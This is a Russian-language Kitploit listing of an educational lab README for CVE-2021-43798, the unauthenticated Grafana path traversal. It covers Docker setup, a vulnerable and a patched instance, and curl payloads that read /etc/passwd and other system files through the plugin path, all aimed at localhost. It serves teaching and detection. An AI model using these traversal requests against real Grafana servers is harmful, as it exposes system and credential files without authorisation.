Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
-INE_Shivam_Gupta_23104003 — CVE-2021-43798 Grafana Path Traversal без аутентификации — Security Lab | Shivam Gupta | 23104003 | Kitploit
Инструменты/GitHubGitHub/shivamg2004/-ine_shivam_gupta_23104003
Безопасность контейнеровАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на ПроникновениеОбучение и ОбразованиеЛаборатории и Практика

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
GitHub
shivamg2004/-ine_shivam_gupta_23104003

-INE_Shivam_Gupta_23104003

CVE-2021-43798 Grafana Path Traversal без аутентификации — Security Lab | Shivam Gupta | 23104003

Репозиторий
8 ч 30 мин назадЕщё не проверено

CVE-2021-43798 — Лаборатория неаутентифицированного обхода пути в Grafana

Только для образовательных целей. Запускайте эту лабораторию только на изолированной локальной машине. Никогда не выставляйте её в интернет.


Сводка по CVE

ПолеДетали
CVE IDCVE-2021-43798
ПродуктGrafana
Уязвимые версии8.0.0 – 8.3.0
Исправленная версия8.3.1+
КритичностьВысокая
Оценка CVSS v3.17.5
CWECWE-22 — Обход пути
Требуется аутентификацияНет
Вектор атакиСеть

Предварительные требования

  • Docker Desktop (запущен)
  • Git
  • curl

Установка

root@kitploit:~
git clone https://github.com/YOUR_USERNAME/INE_Shivam_Gupta.git
cd INE_Shivam_Gupta

Запуск уязвимой среды

root@kitploit:~
docker compose up -d

Проверка:

root@kitploit:~
curl http://127.0.0.1:3000/api/health
# Ожидается: "version": "8.3.0"

Откройте http://127.0.0.1:3000 — логин: admin / admin


Эксплуатация уязвимости

root@kitploit:~
curl.exe --path-as-is "http://127.0.0.1:3000/public/plugins/alertlist/../../../../../../../../../etc/passwd"
curl.exe --path-as-is "http://127.0.0.1:3000/public/plugins/alertlist/../../../../../../../../../etc/lab_secret.txt"

Ожидается: содержимое файла возвращается с HTTP 200 — аутентификация не требуется.


Обнаружение

root@kitploit:~
curl.exe --path-as-is "http://127.0.0.1:3000/public/plugins/alertlist/../../../../../../../../../etc/hostname"
curl.exe http://127.0.0.1:3000/api/health

Если возвращается hostname → УЯЗВИМО. Версия 8.0.0–8.3.0 → УЯЗВИМО.


Устранение

Запуск исправленного экземпляра (Grafana 8.3.1):

root@kitploit:~
docker compose -f docker-compose.patched.yml up -d

Проверка, что эксплойт заблокирован:

root@kitploit:~
curl.exe --path-as-is "http://127.0.0.1:3001/public/plugins/alertlist/../../../../../../../../../etc/passwd"
# Ожидается: {"message": "Plugin file not found"}

Остановка лаборатории

root@kitploit:~
docker compose down
docker compose -f docker-compose.patched.yml down

Ссылки

  • https://nvd.nist.gov/vuln/detail/CVE-2021-43798
  • https://grafana.com/blog/2021/12/07/grafana-8.3.1-and-7.5.12-released-with-moderate-severity-security-fix/
  • https://cwe.mitre.org/data/definitions/22.html
Скачать инструмент